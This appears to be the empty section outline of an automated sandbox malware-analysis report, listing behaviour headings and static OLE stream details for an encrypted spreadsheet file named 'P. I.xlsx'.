Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "P. I.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General